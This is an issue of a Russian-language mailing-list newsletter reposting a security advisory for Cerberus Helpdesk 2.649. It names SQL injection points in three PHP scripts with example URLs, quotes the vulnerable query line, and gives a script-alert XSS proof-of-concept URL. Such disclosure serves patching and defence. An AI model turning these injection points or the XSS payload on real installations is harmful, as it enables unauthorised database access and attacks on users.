Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпуск по безопасности. SQL-инъекции в cerberus.


Информационный Канал Subscribe.Ru

Компьютер для продвинутых пользователей
Содержание:
Cerberus Helpdesk
ПО: Cerberus Helpdesk
Версия: 2.649

О ПО:
Cerberus Helpdesk - группа сети для работы с php программами.
Официальный сайт: http://www.cerberusweb.com/
Описание:
SQL-инъекция в attachment_send.php линия 112:
Вы можете закачать файлы для других пользователей или использовать для атаки эту инъекцию:
Пример URL:
.../support-center/cerberus-support-center/attachment_send.php?file_id=N [SQL] &thread_id=1
Код:$sql = "SELECT part_content FROM thread_attachments_parts WHERE file_id = $file_id";
XSS:
http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
SQL-инъекция в cer_KnowledgebaseHandler.class.php:
Пример URL:
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4 [SQL]
SQL-инъекция в "display_ticket_thread.php":
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]
Cerberus Helpdesk
Рассылка создана и ведется при поддержке Информационной сети Пермского края.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться Вебом Почтой
Вспомнить пароль

В избранное